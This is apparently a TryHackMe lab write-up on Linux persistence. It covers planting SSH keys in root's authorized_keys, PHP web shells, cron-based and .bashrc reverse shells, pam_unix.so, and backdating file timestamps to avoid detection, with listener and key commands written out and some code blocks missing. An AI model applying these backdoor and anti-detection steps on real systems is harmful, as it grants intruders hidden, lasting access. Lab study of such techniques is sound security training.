Linux Backdoors
Date: 17, May, 2021
Author: Dhilip Sanjay S
Click Here to go to the TryHackMe room.
Introduction
A backdoor is simply something we can do to ensure our consistent access to the machine.
So even if the machine is rebooted, shut down or whatever, we would still be able to have access to it.
SSH Backdoors
The ssh backdoor essentially consists of leaving our ssh keys in some user’s home directory. Usually the user would be root as it’s the user with the highest privileges.
Steps:
Run
ssh-keygen
in your local machine.Add the public key to
authorized_keys
in theroot/.ssh
directory of the target machine.Ensure proper permissions:
chmod 600 ~/.ssh/authorized_keys
Now that we have left our backdoor, we can simply login as root using the following commands:
chmod 600 id_rsa
(This is necessary because if we don't do it, ssh will complain about permissions not being secure enough on the key)ssh -i id_rsa root@ip
to login into our desired machine.
Note: This backdoor isn't hidden at all. Anybody with the right permissions would be able to remove our ssh public key or the file authorized_keys entirely.
In what directory do we place our keys ?
Answer: .ssh
What flag in ssh do we use to show our private key?
Answer: -i
PHP Backdoors
If you get root access on a Linux host, you will most likely search for creds and or any useful information in the web root. The web root is usually located in :
/var/www/html
.You can create a php file with any name and put the following piece of code:
Notice that we are using :
$_REQUEST['cmd'])
, which means that you can pass that parameter either in GET or in POST data.To access the shell:
Here are some ways that we could make this backdoor a little more hidden:
CronJob Backdoors
View the contents of
/etc/crontab
:
This represents all the tasks that are scheduled to run at some time on your machine.
In the example above, you can see that there is a "*" symbol under the "h". This means that the following task would run every hour.
Add this line into our cronjob file (* for everything -> our task will run every minute, every hour, every day , etc.):
The contents of the shell file:
We would have to run an HTTP server serving our shell using
python3 -m http.server 8080
Don't forget to listen on your specified port with:
nc -lvnp <port>
Note: Please note that this backdoor isn't really hidden because everyone can see it just by looking inside
/etc/crontab
.
What does the letter "m" mean in cronjobs?
Answer: minute
What does the letter "h" mean in cronjobs?
Answer: hour
.bashrc Backdoors
If a user has bash as their login shell, the .bashrc file in their home directory is executed when an interactive session is launched.
You could simply run this command to include your reverse shell into their .bashrc.
Note:
One important thing is to always have your nc listener ready as you don't know when your user will log on.
This attack is very sneaky as nobody really thinks about ever checking their .bashrc file.
On the other hand, you can't exactly know if any of the user's will actually login to their system, so you might really wait a long period of time.
pam_unix.so Backdoors
pam_unix.so is one of many files in Linux that is responsible for authentication.
Making Detection More Difficult
To make detection of all of these backdoors more difficult one can adjust modification time of the created files (this is what ls command shows) to a past date:
References
Last updated